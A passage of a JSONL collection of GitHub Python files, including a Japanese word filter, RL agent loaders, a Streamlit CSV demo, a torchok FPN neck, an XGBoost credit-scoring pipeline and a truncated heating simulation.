self.__valid_pos(morph.pos):\n return False\n\n if self.__REGEX_STOP_CHAR.match(morph.lexeme):\n return False\n\n if morph.lexeme in self.__stop_words:\n return False\n return True\n\n def __valid_pos(self, pos):\n poses = pos.split('-')\n try:\n if poses[0] == '名詞' and poses[1] in ['一般', '固有名詞', 'サ変接続']:\n if poses[2] == '地域':\n return False\n return True\n else:\n return False\n except IndexError:\n return True\n","repo_name":"maomao905/fun2vec","sub_path":"word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33442876116","text":"import sys\nsys.path.append(\"../\")\nsys.path.append(\"../model\")\nfrom collections import deque\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport os\nimport sys\nfrom IPython.display import clear_output\nimport network_loader\n\n\n\ndef get_path():\n path = os.path.dirname(sys.argv[0]) + '/'\n if not '/toy-model/' in path:\n path = os.getcwd() + '/'\n print(path)\n if path == '':\n path = './'\n #else:\n #index_start = path.index('/test/')\n #index_end = index_start + len('/toy-model/')\n #path = path[:index_start]\n return \"/media/shadowwalker/DATA/study/RIL1/code/carmanufacturing\"\n\ndef one_hot(states, kind_cars):\n length = len(states)\n occ = np.ones(length)\n occ[states == -1] = 0\n res = np.zeros((length, kind_cars))\n for i, state in enumerate(states):\n if occ[i]:\n res[i, state] = 1\n\n return occ, res\n\n\n\ndef linearize(states, kind_cars):\n length = len(states)\n occ, states = one_hot(states, kind_cars)\n states = states.reshape(length * (kind_cars))\n return np.concatenate([occ, states])\n\nclass Agent_wrapper():\n \n def __init__(self, net, KIND_CARS):\n self.net = net\n self.kind_cars = KIND_CARS\n \n def act(self, env, eval_mode = False, n_determined = None):\n if not n_determined:\n state = env.get_state()\n else:\n state = env.get_randomized_state(n_determined = n_determined)\n state = linearize(state, self.kind_cars)\n state = torch.tensor(state).float()\n\n with torch.no_grad():\n action_values = self.net(state).numpy()\n\n if eval_mode:\n possible_actions = env.possible_actions()\n for i in range(len(action_values)):\n if i not in possible_actions:\n action_values[i] = - float(\"inf\")\n\n return np.argmax(action_values)\n\n def q_values(self, state):\n state = linearize(state, self.kind_cars)\n state = torch.tensor(state).float()\n\n with torch.no_grad():\n return self.net(state).numpy()\n\nclass RandomPlayer():\n\n def act(self, env, eval_mode = False):\n actions = env.possible_actions()\n return np.random.choice(actions)\n\n\ndef add_agents(num_lines, capacity_lines, KIND_CARS, MA = False, SA = False, CP = False, Curr = False):\n\n choosen_options = int(MA) + int(SA) + int(CP) + int(Curr)\n if choosen_options == 0 or choosen_options > 1:\n print(\"you must choose exactly one option\")\n return None\n\n front_agents = []\n back_agents = []\n for _ in range(10):\n front_agents.append([])\n back_agents.append([])\n\n num_lines_string = 'NL:' + str(num_lines)\n capacity_lines_string = 'CL:' + str(capacity_lines)\n\n pathname = get_path() + 'results/'\n\n for subdir in os.listdir(pathname):\n if subdir[0] == '.':\n continue\n sign = subdir[0:2]\n if MA and sign != 'MA':\n continue\n if SA and sign != 'SA':\n continue\n if CP and sign != 'CP':\n continue\n if Curr and sign != 'CC':\n continue\n for filename in os.listdir(pathname + subdir):\n if filename[-4:] == '.pth':\n if num_lines_string in filename and capacity_lines_string in filename:\n network_name = pathname + subdir + '/' + filename\n net = network_loader.load_network(network_name)\n agent = Agent_wrapper(net, KIND_CARS)\n\n input_size_index = filename.index('I:') + 2\n input_size = int(filename[input_size_index])\n\n if MA or Curr:\n if 'Front' in filename:\n front_agents[input_size].append((filename[:-4], agent))\n else:\n if 'Back' in filename:\n back_agents[input_size].append((filename[:-4], agent))\n else:\n print('Something went wrong with ', filename)\n else:\n front_agents[input_size].append((filename[:-4], agent))\n if MA or Curr:\n return front_agents, back_agents\n else:\n return front_agents\n","repo_name":"anurag-198/CarManufacturingProblem","sub_path":"model/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42264187737","text":"import streamlit as st\nimport seaborn as sns\nimport pandas as pd\n\ncar_crashes = sns.load_dataset('car_crashes')\n\n@st.cache\ndef convert_df(df):\n return df.to_csv().encode('utf-8')\n\ncsv = convert_df(car_crashes)\n\nst.download_button(\n label=\"Download data as CSV\",\n data=csv,\n file_name='car_crashes.csv',\n mime='text/csv',\n )\n\nuploaded_file = st.file_uploader(\"Choose a file\")\nif uploaded_file is not None:\n dataframe = pd.read_csv(uploaded_file, encoding = 'utf-8)')\n st.write(dataframe)","repo_name":"Junmo1225/Homework","sub_path":"Achievement/downup2.py","file_name":"downup2.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"25514980752","text":"import torch.nn.functional as F\nfrom mmdet.models import necks\n\nfrom torchok.constructor import DETECTION_NECKS\n\n\n@DETECTION_NECKS.register_class\nclass FPN(necks.FPN):\n r\"\"\"Feature Pyramid Network.\n\n This is an implementation of paper `Feature Pyramid Networks for Object\n Detection `_.\n\n Args:\n in_channels (list[int]): Number of input channels per scale.\n out_channels (int): Number of output channels (used at each scale).\n num_outs (int): Number of output scales.\n start_level (int): Index of the start input backbone level used to\n build the feature pyramid. Default: 0.\n end_level (int): Index of the end input backbone level (exclusive) to\n build the feature pyramid. Default: -1, which means the last level.\n add_extra_convs (bool | str): If bool, it decides whether to add conv\n layers on top of the original feature maps. Default to False.\n If True, it is equivalent to `add_extra_convs='on_input'`.\n If str, it specifies the source feature map of the extra convs.\n Only the following options are allowed\n\n - 'on_input': Last feat map of neck inputs (i.e. backbone feature).\n - 'on_lateral': Last feature map after lateral convs.\n - 'on_output': The last output feature map after fpn convs.\n relu_before_extra_convs (bool): Whether to apply relu before the extra\n conv. Default: False.\n no_norm_on_lateral (bool): Whether to apply norm on lateral.\n Default: False.\n conv_cfg (dict): Config dict for convolution layer. Default: None.\n norm_cfg (dict): Config dict for normalization layer. Default: None.\n act_cfg (dict): Config dict for activation layer in ConvModule.\n Default: None.\n upsample_cfg (dict): Config dict for interpolate layer.\n Default: dict(mode='nearest').\n init_cfg (dict or list[dict], optional): Initialization config dict.\n\n Example:\n >>> import torch\n >>> in_channels = [7, 5, 3, 2]\n >>> scales = [340, 170, 84, 43]\n >>> inputs = [torch.rand(1, c, s, s)\n ... for c, s in zip(in_channels, scales)]\n >>> self = FPN(in_channels, 11, len(in_channels)).eval()\n >>> outputs = self.forward(inputs)\n >>> for i in range(len(outputs)):\n ... print(f'outputs[{i}].shape = {outputs[i].shape}')\n outputs[0].shape = torch.Size([1, 11, 340, 340])\n outputs[1].shape = torch.Size([1, 11, 170, 170])\n outputs[2].shape = torch.Size([1, 11, 84, 84])\n outputs[3].shape = torch.Size([1, 11, 43, 43])\n \"\"\"\n\n def __init__(self, in_channels, **kwargs):\n in_channels = list(in_channels[::-1])\n super(FPN, self).__init__(in_channels=in_channels, **kwargs)\n\n def forward(self, inputs):\n \"\"\"Forward function.\"\"\"\n assert len(inputs) == len(self.in_channels)\n\n # build laterals\n laterals = [\n lateral_conv(inputs[i + self.start_level])\n for i, lateral_conv in enumerate(self.lateral_convs)\n ]\n\n # build top-down path\n used_backbone_levels = len(laterals)\n for i in range(used_backbone_levels - 1, 0, -1):\n # In some cases, fixing `scale factor` (e.g. 2) is preferred, but\n # it cannot co-exist with `size` in `F.interpolate`.\n if 'scale_factor' in self.upsample_cfg:\n # fix runtime error of \"+=\" inplace operation in PyTorch 1.10\n laterals[i - 1] = laterals[i - 1] + F.interpolate(\n laterals[i], **self.upsample_cfg)\n else:\n prev_shape = laterals[i - 1].shape[2:]\n laterals[i - 1] = laterals[i - 1] + F.interpolate(\n laterals[i], size=prev_shape, **self.upsample_cfg)\n\n # build outputs\n # part 1: from original levels\n outs = [\n self.fpn_convs[i](laterals[i]) for i in range(used_backbone_levels)\n ]\n # part 2: add extra levels\n if self.num_outs > len(outs):\n # use max pool to get more levels on top of outputs\n # (e.g., Faster R-CNN, Mask R-CNN)\n if not self.add_extra_convs:\n for i in range(self.num_outs - used_backbone_levels):\n outs.append(F.max_pool2d(outs[-1], 1, stride=2))\n # add conv layers on top of original feature maps (RetinaNet)\n else:\n if self.add_extra_convs == 'on_input':\n extra_source = inputs[self.backbone_end_level - 1]\n elif self.add_extra_convs == 'on_lateral':\n extra_source = laterals[-1]\n elif self.add_extra_convs == 'on_output':\n extra_source = outs[-1]\n else:\n raise NotImplementedError\n outs.append(self.fpn_convs[used_backbone_levels](extra_source))\n for i in range(used_backbone_levels + 1, self.num_outs):\n if self.relu_before_extra_convs:\n outs.append(self.fpn_convs[i](F.relu(outs[-1])))\n else:\n outs.append(self.fpn_convs[i](outs[-1]))\n return tuple(outs)\n","repo_name":"eora-ai/torchok","sub_path":"torchok/models/necks/detection/fpn.py","file_name":"fpn.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"95"} +{"seq_id":"19876011679","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[37]:\n\n\n# !/usr/bin/env python\n# ! -*- coding: utf-8 -*-\n\n'''\n@File: model_fit_v3.py\n@Author: RyanZheng\n@Email: ryan.zhengrp@gmail.com\n@Created Time on: 2020-07-26\n'''\n\nimport os\nimport warnings\nfrom datetime import datetime\n\nimport joblib\n\nfrom model_code import tree_selection\nfrom model_code.woe_transformer import *\nfrom model_code.feature_binning import *\nfrom model_code.bayes_opt_tuner import classifiers_model\nfrom model_code.utils import *\nfrom model_code.detector import detect\n\nwarnings.filterwarnings('ignore')\n\nfrom model_code.logger_utils import Logger\n\nlog = Logger(level='info', name=__name__).logger\n\n# =========================step 1 相关配置=========================\nlog.info('step 1 相关配置')\nfeature_type = 'lhpdat' # 什么数据\ncust_id = 'apply_no' # 主键\ntarget = 'target' # 目标变量\ndata_type = 'type' # 区分数据集变量\napply_time = 'apply_time' # 时间\n\nclient = 'lhp09'\nbatch = 'p23'\n\nto_model_var_num = 30 # 不限制的话修改为None\nis_model_data_to_woe = False # 喂入模型的数据是否需要转化为woe值,False不需要,即原始数据入模型\nfillna_value = -999999 # 缺失值填充的值\n\n# 阈值配置\nexclude_cols = [apply_time, cust_id, target, data_type, 'apply_month']\nfeature_missing_threshould = 0.95 # 缺失率大于等于该阈值的变量剔除\n\n# 用于训练模型的数据\nlabel_encoder_dict = {}\nto_model_data_path = '/Users/ryanzheng/PycharmProjects/data_to_treemodel_v1/to_model_data/lhp_amount_rule.csv'\n\n# =========================后续代码基本可以不用动=========================\n\n\n# 基本不用动\nproject_name = '{}{}'.format(client, batch)\nclient_batch = '{}{}'.format(client, batch)\nproject_dir = 'model_result_data/{}/{}/'.format(client, batch)\noutput_dir = '{}model/{}/'.format(project_dir, feature_type)\n\nos.makedirs(project_dir, exist_ok=True)\nos.makedirs(output_dir, exist_ok=True)\nos.makedirs(project_dir + 'data/score/', exist_ok=True)\nos.makedirs(project_dir + 'data/xgb_score/', exist_ok=True)\n# 基本不用动\n# =========================相关配置=========================\n\n\n# In[38]:\n\n\n# =========================step 2 读取数据集=========================\nlog.info('step 2 开始读取数据集')\n# 读取宽表数据\nlog.info('读取样本&特征数据集:{}|{}|{}为样本数据,其他为特征数据'.format(cust_id, apply_time, target))\nall_data = pd.read_csv(to_model_data_path)\n\n# drop_cols = ['xy_black_version', 'tzre_version']\n# all_data.drop(columns=drop_cols, axis=1, inplace=True)\nall_data.drop(['applthst_loan_amount', 'tzre_report_info_report_no', 'xy_black_trade_no', 'tzre_id', 'xy_black_version',\n 'tzre_version', 'tzre_bi_phone_number'], axis=1, inplace=True)\n\nall_data.set_index(cust_id, inplace=True)\nselected_features = all_data.columns.format()\nselected_features = list(set(selected_features) - set(exclude_cols))\nlog.info('特征的个数:{}'.format(len(selected_features)))\n\n# =========================读取字典进行重命名=========================\n# ##读取字典进行重命名\n# fea_dict_df = pd.read_excel('/home/marketingscore/ryanzheng/fit_model_project/新特征数据字典v3.xlsx')\n# fea_dict = fea_dict_df[['feature_code','feature_id']].set_index('feature_code')['feature_id'].to_dict()\n# all_data.rename(columns=fea_dict, inplace=True)\n\n# selected_features = all_data.columns.format()\n# selected_features = list(set(selected_features) - set(exclude_cols))\n# # if exclude_vars:\n# # selected_features = list(set(selected_features) - set(exclude_vars))\n\n# ##仅使用数据字典中有的变量\n# fea_dict_df_list = fea_dict_df['feature_id'].tolist()\n# selected_features = list(set(selected_features).intersection(set(fea_dict_df_list)))\n# print(len(selected_features))\n# ##仅使用数据字典中有的变量\n\n# =========================读取字典进行重命名=========================\n\n\n# 删除特征全为空的样本量\nlog.info('删除特征全为空的样本量')\nprint('删除特征全为空的样本之前的数据集行列:', all_data.shape)\nall_data.dropna(subset=selected_features, how='all', inplace=True)\nprint('删除特征全为空的样本之后的数据集行列:', all_data.shape)\n\nlog.info('样本数据集情况:')\nlog.info(all_data[target].value_counts())\n# =========================读取数据集=========================\n\nlog.info('EDA,整体数据探索性数据分析')\nall_data_eda = detect(all_data)\nall_data_eda.to_excel('{}{}_{}_all_data_eda.xlsx'.format(\n output_dir, project_name, feature_type))\n\n# =========================step 3 划分训练集和测试集=========================\nlog.info('step 3 划分训练集和测试集')\nif data_type not in all_data.columns:\n df_sample = all_data[[target, apply_time]]\n df_sample.reset_index(inplace=True)\n\n # 随机切分train、test\n df_sample = split_data_type(df_sample, key_col=cust_id, target=target, apply_time=apply_time, test_size=0.25)\n df_sample.to_csv(project_dir + 'data/{}_split.csv'.format(client_batch), index=False)\n\n # #按时间切分\n # df_oot = df_sample[df_sample['apply_time']>= '2020-04-01']\n # X_train = df_sample[df_sample['apply_time']<= '2020-02-01']\n # X_test = df_sample[(df_sample['apply_time']> '2020-02-01') & (df_sample['apply_time']< '2020-04-01')]\n\n # df_sample.loc[df_oot.index,'type'] = 'oot'\n # df_sample.loc[X_train.index,'type'] = 'train'\n # df_sample.loc[X_test.index,'type'] = 'test'\n\n df_sample.to_csv(project_dir + 'data/{}_split.csv'.format(client_batch), index=False)\n df_sample.set_index(cust_id, inplace=True)\n print(df_sample['type'].value_counts())\n\n# In[39]:\n\n\n# 将数据集类别和数据集合并\n# df_sample = all_data[[target, apply_time, data_type]]\nall_data = pd.merge(df_sample[['type']], all_data, left_index=True, right_index=True, how='inner')\n\nlog.info('分开训练集和测试集为两个df')\ntrain_data = all_data[all_data['type'] == 'train']\n# test_data = all_data[all_data['type'] == 'test']\n\nlog.info('EDA,训练集探索性数据分析')\ndetect(train_data).to_excel('{}{}_{}_train_data_eda.xlsx'.format(\n output_dir, project_name, feature_type))\n# detect(test_data).to_excel('{}{}_{}_test_data_eda.xlsx'.format(\n# output_dir, project_name, feature_type))\n\n# =========================step 4 初筛=========================\nlog.info('step 4 变量初筛')\n# selected_features = train_data_eda[train_data_eda['missing_q'] <= 0.95].index.to_list()\nprint('删除缺失率前变量数量:', len(selected_features))\nselected_features = filter_miss(train_data[selected_features], miss_threshold=feature_missing_threshould)\nprint('删除缺失率后变量数量:', len(selected_features))\ntrain_data = train_data[selected_features + [target]]\n# test_data = test_data[selected_features + [target]]\n# =========================初筛=========================\n\n\n# =========================step 5 数据处理=========================\nlog.info('step 5 数据woe处理')\n\n# 离散变量数据处理\n# selected_features = list(set(selected_features) - set(exclude_cols))\ncontinuous_cols, category_cols, date_cols = select_features_dtypes(train_data[selected_features])\n\ntrain_data.loc[:, continuous_cols] = train_data.loc[:, continuous_cols].fillna(fillna_value)\n# test_data.loc[:, continuous_cols] = test_data.loc[:, continuous_cols].fillna(fillna_value)\nall_data.loc[:, continuous_cols] = all_data.loc[:, continuous_cols].fillna(fillna_value)\n# data.loc[:, continuous_cols] = data.loc[:, continuous_cols].fillna(-999)\n\n# =========================labelencode=========================\n# def category_to_labelencoder(data, labelencoder=[]):\n# label_encoder_dict = {}\n# le = LabelEncoder()\n# for col in labelencoder:\n# print('{} in process!!!'.format(col))\n# data[col] = le.fit_transform(data[col].values)\n# number = [i for i in range(0, len(le.classes_))]\n# key = list(le.inverse_transform(number))\n# label_encoder_dict[col] = dict(zip(key, number))\n# return label_encoder_dict\n\n\n# def category_to_labelencoder_apply(data, labelencoder_dict={}):\n# for col, mapping in labelencoder_dict.items():\n# print('{} in process!!!'.format(col))\n# data[col] = data[col].map(mapping).fillna(-1)\n# data[col] = data[col].astype(int)\n\n\n# if category_cols:\n# train_data.loc[:, category_cols] = train_data.loc[:, category_cols].fillna('-1007')\n# all_data.loc[:, category_cols] = all_data.loc[:, category_cols].fillna('-1007')\n# label_encoder_dict = category_to_labelencoder(train_data, category_cols)\n# category_to_labelencoder_apply(all_data, label_encoder_dict)\n\n# =========================labelencode=========================\n\n\nif category_cols and not label_encoder_dict:\n log.info('step 5.1 类别变量数据处理')\n # train_data.loc[:, category_cols] = train_data.loc[:, category_cols].fillna('miss')\n # test_data.loc[:, category_cols] = test_data.loc[:, category_cols].fillna('miss')\n\n var_value_woe = category_2_woe(train_data, category_cols, target=target)\n category_2_woe_save(var_value_woe, '{}'.format(output_dir))\n # var_value_woe = category_2_woe_load('{}'.format(output_dir))\n train_data = WoeTransformer().transform(train_data, var_value_woe)\n # test_data = WoeTransformer().transform(test_data, var_value_woe)\n all_data = WoeTransformer().transform(all_data, var_value_woe)\n\n# 离散变量数据处理\n\n\n# In[40]:\n\n\nif is_model_data_to_woe:\n log.info('将箱子转woe')\n log.info('============入模数据需要转化为woe值===========')\n # train_data_to_model = WoeTransformer().transform(train_data_bin, fb.get_var_bin_woe())\n # test_data_to_model = WoeTransformer().transform(test_data_bin, fb.get_var_bin_woe())\n #all_data_to_model = WoeTransformer().transform(all_data_bin, fb.get_var_bin_woe())\nelse:\n log.info('============入模数据不需要转化为woe值===========')\n # train_data_to_model = train_data.copy()\n # test_data_to_model = test_data.copy()\n all_data_to_model = all_data.copy()\n\n\n# In[41]:\n\n\ndef statistics_model_result(all_data=pd.DataFrame()):\n # ===========================step 6 统计=================================\n all_data['score'] = all_data[feature_type].map(lambda v: to_score(v))\n log.info('模型相关结果统计!!!')\n df_splitted_type_auc_ks = all_data.groupby(data_type).apply(\n lambda df: pd.Series({'auc': get_roc_auc_score(df[target], df['score']),\n 'ks': get_ks(df[target], df['score'])}))\n df_splitted_type_auc_ks = df_splitted_type_auc_ks.reindex(['train', 'test', 'oot', 'cv'])\n\n log.info('模型效果:')\n print(df_splitted_type_auc_ks)\n\n all_data['month'] = all_data[apply_time].map(lambda s: s[:7])\n df_monthly_auc_ks = all_data.groupby('month').apply(\n lambda df: pd.Series({'auc': get_roc_auc_score(df[target], df['score']),\n 'ks': get_ks(df[target], df['score'])}))\n del all_data['month']\n log.info('不同月份的模型效果:')\n print(df_monthly_auc_ks)\n\n df_desc = all_data[[feature_type, 'score']].describe()\n df_desc.loc['coverage'] = df_desc.loc['count'] / all_data.shape[0]\n log.info('分数describe')\n print(df_desc)\n\n all_data[data_type] = all_data[data_type].map(lambda s: s.lower())\n all_data['client_batch'] = client_batch\n # df_psi,df_psi_details = psi_statis(all_data, splitted_types=['train','test','oot'], scores=[feature_type])\n df_psi, df_psi_details = psi_statis(all_data, splitted_types=['train', 'test'], scores=[feature_type])\n del all_data['client_batch']\n log.info('模型psi:')\n print(df_psi[['train_test_psi']])\n # log.info(df_psi[['train_test_psi','train_oot_psi']])\n\n df_output_statis = df_splitted_type_auc_ks.reset_index()\n df_output_statis['feature'] = feature_type\n df_output_statis['project_name'] = project_name\n df_output_statis['client_batch'] = client_batch\n df_output_statis = df_output_statis.pivot_table(\n index=['project_name', 'client_batch', 'feature'],\n columns=data_type,\n values=['auc', 'ks'])\n df_output_statis.columns = ['_'.join(reversed(x)) for x in df_output_statis.columns]\n df_output_statis['feature_cnt'] = len(selected_features)\n df_output_statis['n_estimators'] = model.get_params()['n_estimators']\n\n log.info('统计结束')\n return df_output_statis\n # ===========================统计=================================\n\n\n# In[42]:\n\n\n# =========================step 6 训练模型=========================\nX_all, y_all, X_train, y_train, X_test, y_test, X_oot, y_oot = get_splitted_data(\n all_data_to_model, target=target, selected_features=selected_features)\n\nprint('整体数据集大小:', X_all.shape)\nprint('训练集大小:', X_train.shape)\nprint('测试集大小:', X_test.shape)\nif X_oot is None:\n print('无oot数据集')\nelse:\n print('oot集大小:', X_oot.shape)\n\npd.Series(X_test.index).to_csv('{}{}_{}_X_test_key_{}.csv'.format(\n output_dir, project_name, feature_type, cust_id), header=cust_id, index=False)\n\nlog.info('step 6 开始训练模型')\nstart = datetime.now()\n\nlog.info('step 6.1 ===筛选变量===')\n\n# ===========================================\n\nlog.info('step 6.1 ===筛选变量===10折交叉后,计算变量的平均重要性')\n# feature_imp = tree_selection.kfold_xgb_model(train_data=(del_corr_df, y_train))\nlog.info('筛选前数据集大小:{}'.format(X_train.shape))\nfeature_imp = tree_selection.change_col_subsample_fit_model(train_data=(X_train, y_train),\n test_data=(X_test, y_test))\n\nlog.info('将特征重要性持久化')\nfeature_imp.to_csv('{}{}_{}_xgb_allfeature_mean_imp_df.csv'.format(\n output_dir, project_name, feature_type))\n\nlog.info('根据10折拟合模型处理后的变量重要性进行变量相关性筛选')\ndel_corr_df = tree_selection.drop_corr(X_train, by=feature_imp, threshold=0.9)\n# del_corr_df = tree_selection.drop_corr(del_corr_df, by=feature_imp, threshold=0.8)\nlog.info('筛选后数据集大小:{}'.format(del_corr_df.shape))\n\n# ===========================================\n\nselected_features = list(del_corr_df.columns)\nlog.info('最终入模变量的数量:{}'.format(len(selected_features)))\nlog.info('最终入模变量:{}'.format(selected_features))\n\nfeature_imp = tree_selection.change_col_subsample_fit_model(train_data=(del_corr_df, y_train),\n test_data=(X_test[del_corr_df.columns], y_test))\n\nlog.info('将待入模特征重要性持久化')\nfeature_imp.to_csv('{}{}_{}_xgb_tomodel_feature_mean_imp_df.csv'.format(\n output_dir, project_name, feature_type))\n\nlog.info('贝叶斯进行模型调参')\nmodel = classifiers_model(train_data=(X_train[selected_features], y_train),\n test_data=(X_test[selected_features], y_test),\n init_points=5, iterations=8, verbose=1)\nlog.info('模型调参完成!!!')\nlog.info('模型参数:{}'.format(model.get_xgb_params()))\nlog.info('模型参数:{}'.format(model.get_params()))\n\ndf_featurescore = pd.DataFrame(list(model._Booster.get_fscore().items()), columns=['特征名称', '特征权重值']\n ).sort_values('特征权重值', ascending=False)\ndf_featurescore.to_csv('{}{}_{}_xgb_featurescore_first.csv'.format(\n output_dir, project_name, feature_type), index=False)\n\nend = datetime.now()\nlog.info('模型训练完成, 使用 {} 秒'.format((end - start).seconds))\n\n# X_all = pd.concat([X_train, X_test])\nX_all[feature_type] = model.predict_proba(X_all[selected_features])[:, 1]\nall_data = pd.concat([all_data_to_model, X_all[feature_type]], axis=1)\n\nstatistics_model_result(all_data=all_data)\n\n# X_all.to_csv('{}{}_{}_X_all.csv'.format(output_dir, project_name, feature_type))\n# all_data.to_csv('{}{}_{}_all_data.csv'.format(output_dir, project_name, feature_type))\n\n\nif to_model_var_num:\n start = datetime.now()\n\n print('过滤前{}个特征出来,再次训练'.format(to_model_var_num))\n # importance = model._Booster.get_fscore()\n # importance = sorted(importance.items(), key=operator.itemgetter(1), reverse=True)\n # features_importance = pd.DataFrame()\n # features_importance = features_importance.append(importance, ignore_index=True)\n # features_importance.columns = ['特征名称', '特征权重值']\n # # features_importance.to_csv(\n # # '{}{}_{}_xgb_features_importance.csv'.format(output_dir, project_name, feature_type))\n # selected_features = features_importance.iloc[:to_model_var_num]['特征名称'].tolist()\n\n selected_features = df_featurescore.iloc[:to_model_var_num]['特征名称'].tolist()\n\n print('过滤后的特征:', selected_features)\n\n X_all, y_all, X_train, y_train, X_test, y_test, X_oot, y_oot = get_splitted_data(\n all_data_to_model, target=target, selected_features=selected_features)\n print('整体数据集大小:', X_all.shape)\n print('训练集大小:', X_train.shape)\n print('测试集大小:', X_test.shape)\n if X_oot is None:\n print('无oot数据集')\n else:\n print('oot集大小:', X_oot.shape)\n\n # 手动指定调参\n # model = xgb.XGBClassifier(**ini_params)\n # model.fit(X_train, y_train)\n\n # 贝叶斯调参\n log.info('贝叶斯进行模型调参')\n model = classifiers_model(train_data=(X_train[selected_features], y_train),\n test_data=(X_test[selected_features], y_test),\n init_points=5, iterations=8, verbose=1)\n log.info('模型调参完成!!!')\n log.info('模型参数:{}'.format(model.get_xgb_params()))\n log.info('模型参数:{}'.format(model.get_params()))\n\n end = datetime.now()\n log.info('模型训练完成, 使用 {} 秒'.format((end - start).seconds))\n\n# X_all = pd.concat([X_train, X_test])\nX_all[feature_type] = model.predict_proba(X_all[selected_features])[:, 1]\nall_data = pd.concat([all_data_to_model, X_all[feature_type]], axis=1)\n\ndf_output_statis = statistics_model_result(all_data=all_data)\n\n# X_all.to_csv('{}{}_{}_X_all.csv'.format(output_dir, project_name, feature_type))\n# all_data.to_csv('{}{}_{}_all_data.csv'.format(output_dir, project_name, feature_type))\n\n\n# ==========================训练模型=========================\n\n\n# In[43]:\n\n\n# ===========================step 7 模型持久化=================================\n\nlog.info('模型相关结果持久化')\nall_data[feature_type].to_frame().to_csv(\n '{}/data/score/{}_{}_score.csv'.format(project_dir, project_name, feature_type))\nall_data[feature_type].to_frame().to_csv(\n '{}/data/xgb_score/{}_{}_score.csv'.format(project_dir, project_name, feature_type))\nall_data[feature_type].to_frame().to_csv('{}{}_{}_score.csv'.format(\n output_dir, project_name, feature_type))\n\njoblib.dump(model._Booster, '{}{}_{}_xgb.ml'.format(\n output_dir, project_name, feature_type))\njson.dump(model.get_params(), open('{}{}_{}_xgb.params'.format(\n output_dir, project_name, feature_type), 'w'))\n\nmodel._Booster.dump_model('{}{}_{}_xgb.txt'.format(output_dir, project_name, feature_type))\n\ndf_featurescore = pd.DataFrame(list(model._Booster.get_fscore().items()), columns=['特征名称', '特征权重值']\n ).sort_values('特征权重值', ascending=False)\ndf_featurescore.to_csv('{}{}_{}_xgb_featurescore.csv'.format(\n output_dir, project_name, feature_type), index=False)\n\ndf_corr = X_all.corr()\ndf_corr.to_csv('{}{}_{}_xgb_corr.csv'.format(\n output_dir, project_name, feature_type), index_label='feature')\n\ndf_rawdata = all_data[selected_features]\ndf_rawdata.reset_index(inplace=True)\ndf_rawdata_col_name = df_rawdata.columns.tolist()\ndf_rawdata_col_name.insert(len(df_rawdata_col_name) - 1,\n df_rawdata_col_name.pop(df_rawdata_col_name.index(cust_id)))\ndf_rawdata = df_rawdata[df_rawdata_col_name]\ndf_rawdata.head(100).to_csv('{}{}_{}_xgb_rawdata.csv'.format(\n output_dir, project_name, feature_type), index=False)\n\ndf_output_statis.to_csv('{}{}_{}_xgb_output_statis.csv'.format(\n output_dir, project_name, feature_type))\n\nos.makedirs(project_dir + 'data/statis/auc_ks', exist_ok=True)\ndf_output_statis.to_csv('{}data/statis/auc_ks/{}.csv'.format(\n project_dir, feature_type))\n\nlog.info('模型相关结果持久化完成')\n# ===========================模型持久化=================================\n\n\n# In[ ]:\n\n\n# In[ ]:\n","repo_name":"ZhengRyan/data_to_treemodel","sub_path":"model_fit_nobin_top30_lhp_amount_rule.py","file_name":"model_fit_nobin_top30_lhp_amount_rule.py","file_ext":"py","file_size_in_byte":20903,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"11098695142","text":"import pandas as pd\nimport networkx as nx\nimport json\n\nwith open(snakemake.input[0]) as f:\n df = json.load(f)\n\n\nall_links = list(df['links'].keys())\nrecords = []\nfor link in all_links:\n spl = link.split(\";\")\n record = {\n \"Source\": spl[0],\n \"Target\": spl[1],\n }\n records.append(record)\n\n\nlinks_df = pd.DataFrame(records)\nlinks_df.to_csv(snakemake.output[0])\n","repo_name":"murrayds/fakenews_pl","sub_path":"workflow/scripts/convert_links_to_edgelist.py","file_name":"convert_links_to_edgelist.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"39399413118","text":"\"\"\"Module that contains the functions that simulate\nthe actual transitions in temperature desired by the simulator\n\n!NOT FUNCTIONAL!\"\"\"\n\n###IMPORT SECTION###\nimport math as m\nimport time\nimport simFormulas as f\nimport csv as c\n\nfrom datetime import datetime as t\nfrom datetime import timedelta\nfrom datadump import DesiredTemps, SpecificHeat, SpecificMass\n\n###VARIABLE SECTION###\n\n###FUNCTION SECTION###\ndef realism_transitioning(currTemp, surface, roomCapacity, floorCapacity, speedup):\n with open(\"..\\\\WPS\\\\simData.csv\", \"w\") as file:\n wrt = c.writer(file, dialect=\"excel\", delimiter=\";\")\n \n ticker = 0\n timestart = t(2018, 10, 1, 0, 0, 0, 0)\n\n currRoomTemp = currTemp\n currFloorTemp = currTemp\n \n start = t.now()\n \n while currRoomTemp <= DesiredTemps[\"Desired Temp Room\"]:\n \n currFloorDeltaT = f.CurrentDeltaT(f.FloorWarmingPower(surface),f.TrueSubstanceMass(floorCapacity, SpecificMass[\"Gewapend Beton\"]),SpecificHeat[\"Beton\"])\n currFloorTemp += currFloorDeltaT \n \n currRoomDeltaT = f.CurrentDeltaT(f.HeatTransfer(f.TransferCoefficient(0.25),surface,f.CurrentDeltaT(f.WarmthRequired(f.TrueSubstanceMass(floorCapacity, SpecificMass[\"Gewapend Beton\"]),SpecificHeat[\"Beton\"],currFloorDeltaT),SpecificMass[\"Lucht\"],SpecificHeat[\"Lucht\"])),f.TrueSubstanceMass(roomCapacity,SpecificMass[\"Lucht\"]),SpecificHeat[\"Lucht\"])\n if currFloorTemp > currRoomTemp:\n currRoomTemp += currRoomDeltaT\n currtime = (t.now() - start)\n currtime = currtime.total_seconds() / 3600\n outsideTemp = f.TemperatureModel(currtime) * 0.0005\n if 